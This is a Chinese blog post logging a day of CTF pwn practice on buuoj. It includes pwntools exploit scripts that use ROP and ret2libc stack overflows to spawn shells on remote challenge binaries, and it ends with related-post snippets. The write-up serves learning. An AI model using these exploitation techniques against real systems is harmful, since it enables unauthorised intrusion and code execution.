21 07 14学习总结

最新推荐文章于 2024-03-30 09:13:57 发布
最新推荐文章于 2024-03-30 09:13:57 发布
阅读量231 收藏
点赞数
分类专栏: 做题记录 学习经历 Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/118748104
版权
学习经历 同时被 3 个专栏收录
83 篇文章 3 订阅
订阅专栏
Pwn
32 篇文章 0 订阅
订阅专栏
做题记录
19 篇文章 0 订阅
订阅专栏
博主分享了一天的学习历程,主要涉及CTF比赛中的pwn题目,包括baby_rop、jarvisoj_level2_x64等,通过编写Python脚本利用rop技术攻破。此外,还学习了基础Linux指令,并在尝试ucore练习时遇到问题,计划后续解决。
摘要由CSDN通过智能技术生成

21.07.14学习总结

Tags: learning experience

05:00-06:10: buuoj刷题

[HarekazeCTF2019]baby_rop: 白给的rop

jarvisoj_level2_x64: 白给的rop, 唯一要注意的就是find -name 找flag

others_shellcode: 连上去直接getshell, 不知道存在的意义是啥

pwn2_sctf_2016: 32位的常规栈题, 复习了一下32位传参, 同时还发现sh在32位好像不能直接getshell至少这题不行, $0的话后面不是\x00也不行, 这题还给了中断, 不知道干嘛的…

09:00-09:30: 继续整Linux私房菜, 看了些基础指令, 学了个man和info(呜呜, 我基础好差)

21:00-21:30: 复习了一下ucore前面写的东西, 然后做练习2的时候Linux出问题了, 明天继续…

21:30-22:20(然后睡着了): buuoj刷题, ciscn_s_3还是蛮有意思的, 纯csu的艺术了属于是

baby_rop:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./babyrop')
sh=remote('node4.buuoj.cn',29498)
elf=ELF('./babyrop')

pop_rdi=0x400683
payload='a'*24+p64(pop_rdi)+p64(0x601048)+p64(elf.plt['system'])
sh.recv()
sh.sendline(payload)
sh.interactive()

jarvisoj_level2_x64:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node4.buuoj.cn',29241)
elf=ELF('./level2_x64')
payload='w'*136+p64(0x4006b3)+p64(0x600a90)+p64(elf.plt['system'])
sh.recv()
sh.sendline(payload)
sh.interactive()

others_shellcode:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node4.buuoj.cn',27146)
sh.interactive()

pwn2_sctf_2016:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./pwn2_sctf_2016')
elf=ELF('./pwn2_sctf_2016')
libc=ELF('./libc-2.23.so')
#context.log_level='debug'
sh=remote('node4.buuoj.cn',26341)
vuln=0x804852f
sh.recv()
sh.sendline('-1')
sh.recv()
payload1='w'*48+p32(elf.sym['printf'])+p32(0x80485b8)+p32(0x80486f8)+p32(elf.got['printf'])
sh.sendline(payload1)
sh.recvuntil('said: ')
sh.recvuntil('said: ')
printf_addr=u32(sh.recv(4))
log.success('printf addr: '+hex(printf_addr))
libc_base=-libc.sym['printf']+printf_addr
log.success('libc base: '+hex(libc_base))
sh.recv()
sh.sendline('-1')
pause()
sh.recv()
payload2='w'*48+p32(libc_base+libc.sym['system'])+'wwww'+p32(libc_base+libc.search('/bin/sh').next())
sh.sendline(payload2)
sh.interactive()
北岛静石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn2_sctf2016
红叶的博客
11-01 490
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
[HarekazeCTF2019]baby_rop2
z1r0的博客
12-07 886
[HarekazeCTF2019]baby_rop2 查看保护 有溢出,ret2libc即可。这里使用printf这个函数来泄露libc。 printf有两个参数。第一个用rdi来压参数。第二个用rsi来。泄露出libc之后,还是正常的rop。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('
pwn2_sctf_2016
z1r0的博客
12-06 719
pwn2_sctf_2016 查看保护 这里的int给转换成了无符号的,输入-1的时候,值会变得很大,整型溢出。ret2libc即可 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25828) else: r = process(file_name)
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 370
IDA Pro 静态调试。依旧可以使用上次的PoC。
最新尚硅谷AI视频教程(机器学习
02-25
07_人工智能_线性回归模型.avi 08_人工智能_线性回归习题和总结.avi 09_人工智能_Logistic回归模型与练习.avi 10_人工智能_决策树ID3-C4.5算法.avi 11_人工智能_随机森林与梯度提升.avi 12_人工智能_朴素贝叶斯文本...
单片机考试选择填空简答分析题总结.doc
11-28
14. 复位后的默认状态:89C51复位后,选择工作寄存器区0。 15. 输出数据:使用MOVX @DPTR, A指令可以从尾部扩展的I/O口输出数据。 16. 计数器工作方式:8位计数器定时器T0的工作方式2具有自动重装载功能。 17. ...
birt 个人总结 珍藏
10-23
¬14:31:21 gillion07select*fromcdm_port;--ۿ select*fromcdm_port_facility;--ͷ select*fromspm_voyage;--// select*fromcdm_container_type;-- select*fromecm_container_master;-- select*fromecm_Container_...
07-08年的Toefl词汇题总结
12-23
以下是对07-08年托福词汇题的总结,这些词汇和它们的同义词可以帮助考生扩大词汇量,提高语言表达的准确性和丰富性。 1. astonishing/amazing:这两个词都表示令人惊讶的,通常用于描述出乎意料的事情。 2. assert/...
学习的看过来了spring4.0、springboot、springcloud详细视频课程(硅谷)
03-09
14.硅谷学习_SpringCloud_SpringCloud国内使用情况 15.硅谷学习_SpringCloud_Rest微服务案例-总体概述 16.硅谷学习_SpringCloud_Rest微服务案例-父工程构建步骤 17.硅谷学习_SpringCloud_Rest微服务案例-API公共...
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4295
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 432
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 673
pwn 64位 泄露libc版本
【CTF】pwn2_sctf_2016
凉水的博客
07-16 911
pwn2_sctf_2016
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 271
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 958
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
HarekazeCTF2019 baby_rop2
最新发布
qq_60209620的博客
03-30 272
其实就是简单的64位ret2libc,但是有一些坑需要知道。
HTML学习指南:从基础到实践总结
HTML学习不仅需要记忆标签,更需理解其工作原理和语义含义,同时关注字符集选择和网页结构的合理性。通过系统地学习和实践,初学者能够逐步掌握这一基础技能,并为后续的CSS和JavaScript学习打下坚实基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值